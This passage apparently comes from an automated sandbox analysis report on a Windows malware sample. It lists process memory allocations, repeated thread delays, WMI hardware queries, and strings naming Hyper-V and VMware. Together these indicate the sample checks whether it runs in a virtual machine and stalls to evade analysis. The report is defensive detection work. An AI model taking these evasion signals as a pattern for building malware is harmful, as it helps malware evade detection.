                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeMemory allocated: 59F0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeMemory allocated: 69F0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeMemory allocated: 8020000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeMemory allocated: 5D80000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeMemory allocated: 21EDB000000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeMemory allocated: 21EF4BF0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeMemory allocated: F90000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeMemory allocated: 2A80000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeMemory allocated: 4A80000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\license.exeMemory allocated: F10000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\license.exeMemory allocated: 2C50000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\license.exeMemory allocated: 2B80000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\license.exeMemory allocated: 5340000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\license.exeMemory allocated: 6340000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\license.exeMemory allocated: 7990000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\license.exeMemory allocated: 57D0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeMemory allocated: 15189460000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeMemory allocated: 151A2D50000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\license.exeMemory allocated: 1890000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\license.exeMemory allocated: 3260000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\license.exeMemory allocated: 5260000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\hosts.exeMemory allocated: 1E7CECA0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\hosts.exeMemory allocated: 1E7E86F0000 memory reserve | memory write watch
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_085A3BA1 sldt word ptr [eax]1_2_085A3BA1
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeThread delayed: delay time: 180000
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeWindow / User API: threadDelayed 593Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7101Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2684Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeWindow / User API: threadDelayed 2647Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeWindow / User API: threadDelayed 7115Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeWindow / User API: threadDelayed 6082
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeWindow / User API: threadDelayed 3624
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exe TID: 1396Thread sleep count: 593 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exe TID: 7392Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exe TID: 5868Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1252Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 7284Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exe TID: 7952Thread sleep time: -21213755684765971s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exe TID: 7952Thread sleep time: -36000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exe TID: 7952Thread sleep time: -35890s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exe TID: 7952Thread sleep time: -35781s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exe TID: 7952Thread sleep time: -35672s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exe TID: 7952Thread sleep time: -35562s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exe TID: 7952Thread sleep time: -35453s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exe TID: 7952Thread sleep time: -35343s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exe TID: 7952Thread sleep time: -35231s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exe TID: 7952Thread sleep time: -35125s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exe TID: 7952Thread sleep time: -35015s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exe TID: 7952Thread sleep time: -34906s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exe TID: 7952Thread sleep time: -34797s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exe TID: 7952Thread sleep time: -34672s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exe TID: 7952Thread sleep time: -34562s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exe TID: 7952Thread sleep time: -34453s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exe TID: 7952Thread sleep time: -34343s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exe TID: 7952Thread sleep time: -34234s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exe TID: 7952Thread sleep time: -34125s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exe TID: 7952Thread sleep time: -34015s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exe TID: 7952Thread sleep time: -33852s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exe TID: 7952Thread sleep time: -33679s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exe TID: 7952Thread sleep time: -33578s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exe TID: 7952Thread sleep time: -33469s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exe TID: 7952Thread sleep time: -33344s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exe TID: 7952Thread sleep time: -33234s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exe TID: 7952Thread sleep time: -33125s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392Thread sleep time: -27670116110564310s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392Thread sleep time: -180000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392Thread sleep time: -59843s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392Thread sleep time: -59687s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392Thread sleep time: -59577s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392Thread sleep time: -59468s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392Thread sleep time: -59339s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392Thread sleep time: -118436s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392Thread sleep time: -118218s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392Thread sleep time: -58994s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 6276Thread sleep time: -180000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392Thread sleep time: -119750s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392Thread sleep time: -59719s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392Thread sleep time: -59575s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392Thread sleep time: -59294s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392Thread sleep time: -59172s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392Thread sleep time: -59766s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392Thread sleep time: -59655s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392Thread sleep time: -59531s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392Thread sleep time: -59418s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392Thread sleep time: -59311s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392Thread sleep time: -59188s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392Thread sleep time: -59077s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392Thread sleep time: -59830s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392Thread sleep time: -59703s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392Thread sleep time: -59594s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392Thread sleep time: -59471s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392Thread sleep time: -59350s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392Thread sleep time: -59078s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392Thread sleep time: -59721s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392Thread sleep time: -59568s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392Thread sleep time: -59438s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392Thread sleep time: -59299s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392Thread sleep time: -59127s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392Thread sleep time: -59642s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392Thread sleep time: -59464s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392Thread sleep time: -59282s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392Thread sleep time: -59797s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392Thread sleep time: -59623s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392Thread sleep time: -59487s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392Thread sleep time: -59363s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392Thread sleep time: -59106s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392Thread sleep time: -58948s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392Thread sleep time: -59851s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392Thread sleep time: -59735s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392Thread sleep time: -59469s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392Thread sleep time: -59344s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392Thread sleep time: -59219s >= -30000s
                      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Roaming\a.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Roaming\a.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                      Source: C:\Users\user\AppData\Roaming\a.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\a.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\a.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\hosts.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeThread delayed: delay time: 36000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeThread delayed: delay time: 35890Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeThread delayed: delay time: 35781Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeThread delayed: delay time: 35672Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeThread delayed: delay time: 35562Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeThread delayed: delay time: 35453Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeThread delayed: delay time: 35343Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeThread delayed: delay time: 35231Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeThread delayed: delay time: 35125Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeThread delayed: delay time: 35015Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeThread delayed: delay time: 34906Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeThread delayed: delay time: 34797Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeThread delayed: delay time: 34672Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeThread delayed: delay time: 34562Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeThread delayed: delay time: 34453Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeThread delayed: delay time: 34343Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeThread delayed: delay time: 34234Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeThread delayed: delay time: 34125Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeThread delayed: delay time: 34015Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeThread delayed: delay time: 33852Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeThread delayed: delay time: 33679Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeThread delayed: delay time: 33578Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeThread delayed: delay time: 33469Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeThread delayed: delay time: 33344Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeThread delayed: delay time: 33234Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeThread delayed: delay time: 33125Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeThread delayed: delay time: 60000
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeThread delayed: delay time: 59843
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeThread delayed: delay time: 59687
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeThread delayed: delay time: 59577
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeThread delayed: delay time: 59468
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeThread delayed: delay time: 59339
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeThread delayed: delay time: 59218
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeThread delayed: delay time: 59109
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeThread delayed: delay time: 58994
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeThread delayed: delay time: 180000
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeThread delayed: delay time: 59875
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeThread delayed: delay time: 59719
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeThread delayed: delay time: 59575
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeThread delayed: delay time: 59294
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeThread delayed: delay time: 59172
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeThread delayed: delay time: 59766
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeThread delayed: delay time: 59655
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeThread delayed: delay time: 59531
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeThread delayed: delay time: 59418
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeThread delayed: delay time: 59311
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeThread delayed: delay time: 59188
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeThread delayed: delay time: 59077
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeThread delayed: delay time: 59830
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeThread delayed: delay time: 59703
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeThread delayed: delay time: 59594
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeThread delayed: delay time: 59471
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeThread delayed: delay time: 59350
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeThread delayed: delay time: 59078
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeThread delayed: delay time: 59721
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeThread delayed: delay time: 59568
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeThread delayed: delay time: 59438
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeThread delayed: delay time: 59299
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeThread delayed: delay time: 59127
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeThread delayed: delay time: 59642
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeThread delayed: delay time: 59464
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeThread delayed: delay time: 59282
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeThread delayed: delay time: 59797
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeThread delayed: delay time: 59623
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeThread delayed: delay time: 59487
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeThread delayed: delay time: 59363
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeThread delayed: delay time: 59106
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeThread delayed: delay time: 58948
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeThread delayed: delay time: 59851
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeThread delayed: delay time: 59735
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeThread delayed: delay time: 59469
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeThread delayed: delay time: 59344
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeThread delayed: delay time: 59219
                      Source: chrome.exe, 0000000C.00000002.1510888505.0000021F24EDA000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1471920601.0000021F24ED5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Root Partition/
                      Source: chrome.exe, 0000000C.00000003.1413518447.0000021F40DB3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Packets: Success + Error / sec3296Out - Teredo Relay Total Packets: Success + Error / sec3298In - Teredo Relay Success Packets: Data Packets User Mode3300In - Teredo Relay Success Packets: Data Packets Kernel Mode3302Out - Teredo Relay Success Packets: Data Packets User Mode3304Out - Teredo Relay Success Packets: Data Packets Kernel Mode3306IPHTTPS Session3308Packets received on this session3310Packets sent on this session3312Bytes received on this session3314Bytes sent on this session3316Errors - Transmit errors on this session3318Errors - Receive errors on this session3320Duration - Duration of the session (Seconds)3344DNS64 Global3346AAAA queries - Successful3348AAAA queries - Failed3350IP6.ARPA queries - Matched3352Other queries - Successful3354Other queries - Failed3356AAAA - Synthesized records3322IPHTTPS Global3324In - Total bytes received3326Out - Total bytes sent3328Drops - Neighbor resolution timeouts3330Errors - Authentication Errors3332Out - Total bytes forwarded3334Errors - Transmit errors on the server3336Errors - Receive errors on the server3338In - Total packets received3340Out - Total packets sent3342Sessions - Total sessions3230Teredo Server3232In - Teredo Server Total Packets: Success + Error3234In - Teredo Server Success Packets: Total3236In - Teredo Server Success Packets: Bubbles3238In - Teredo Server Success Packets: Echo3240In - Teredo Server Success Packets: RS-Primary3242In - Teredo Server Success Packets: RS-Secondary3244In - Teredo Server Error Packets: Total3246In - Teredo Server Error Packets: Header Error3248In - Teredo Server Error Packets: Source Error3250In - Teredo Server Error Packets: Destination Error3252In - Teredo Server Error Packets: Authentication Error3254Out - Teredo Server: RA-Primary3256Out - Teredo Server: RA-Secondary 3258In - Teredo Server Total Packets: Success + Error / sec3206Teredo Client3208In - Teredo Router Advertisement3210In - Teredo Bubble3212In - Teredo Data3214In - Teredo Invalid3216Out - Teredo Router Solicitation3218Out - Teredo Bubble3220Out - Teredo Data3222In - Teredo Data User Mode3224In - Teredo Data Kernel Mode3226Out - Teredo Data User Mode3228Out - Teredo Data Kernel Mode6468Hyper-V Dynamic Memory Integration Service6470Maximum Memory, Mbytes1848Bluetooth Radio1850Classic ACL bytes written/sec1852LE ACL bytes written/sec1854SCO bytes written/sec1856Classic ACL bytes read/sec1858LE ACL bytes read/sec1860SCO bytes read/sec1862Classic ACL Connections1864LE ACL Connections1866SCO Connections1868Sideband SCO Connections1870ACL flush events/sec1872LE ACL write credits1874Classic ACL write credits1876LE Scan Duty Cycle (%) - Uncoded 1M Phy1878LE Scan Window - Uncoded 1M Phy1880LE Scan Interval - Uncoded 1M Phy1882Page Scan Duty Cycle (%)1884Page Scan Window1886Page Scan Interval1888Inquiry Scan Duty Cycle (%)1890Inquiry Scan Window1892Inquiry Scan Interval1894LE Scan Duty Cycle (%) - Coded Phy1896LE Scan Window - Coded Phy1898LE Scan Interval - Coded Phy1900Bluetooth Device1902Clas
                      Source: chrome.exe, 0000000C.00000002.1529061146.00003D3C01474000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: VMware
                      Source: chrome.exe, 0000000C.00000003.1421070490.0000021F40E47000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1419108757.0000021F40E38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processh
                      Source: chrome.exe, 0000000C.00000002.1510374519.0000021F24D32000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Dynamic Memory Integration Service
                      Source: chrome.exe, 0000000C.00000003.1472885600.0000021F24DA4000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1510374519.0000021F24DA4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor!}
                      Source: chrome.exe, 0000000C.00000003.1472885600.0000021F24DA4000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1510374519.0000021F24DA4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Root Partition8ox
                      Source: chrome.exe, 0000000C.00000002.1510888505.0000021F24EDA000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1471920601.0000021F24ED5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Logical Processorc.sysL+
                      Source: a.exe, 0000000B.00000002.1787672422.00000000033FC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: rRD:\sources\replacementmanifests\microsoft-hyper-v-client-migration-replacement.man
                      Source: chrome.exe, 0000000C.00000002.1514580834.0000021F40DDA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \REGISTRY\USER\S-1-5-21-2246122658-3693405117-2476756634-1002_Classes\CLSID\{748F920F-FB24-4D09-B360-BAF6F199AD6D}\InprocServer32e6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global TimI
                      Source: chrome.exe, 0000000C.00000002.1510888505.0000021F24EDA000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1471920601.0000021F24ED5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DHyper-V Virtual Machine Bus Pipes
                      Source: a.exe, 0000000B.00000002.1787672422.00000000031E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmGuestLib.dllDselect * from Win32_ComputerSystem
                      Source: chrome.exe, 0000000C.00000002.1495197441.0000021F1E847000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll(
                      Source: chrome.exe, 0000000C.00000003.1421070490.0000021F40E47000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1419108757.0000021F40E38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828
                      Source: a.exe, 0000000B.00000002.1787672422.00000000033FC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: r3microsoft-hyper-v-drivers-migration-replacement.man
                      Source: chrome.exe, 0000000C.00000003.1419243436.0000021F40DDA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global TimI
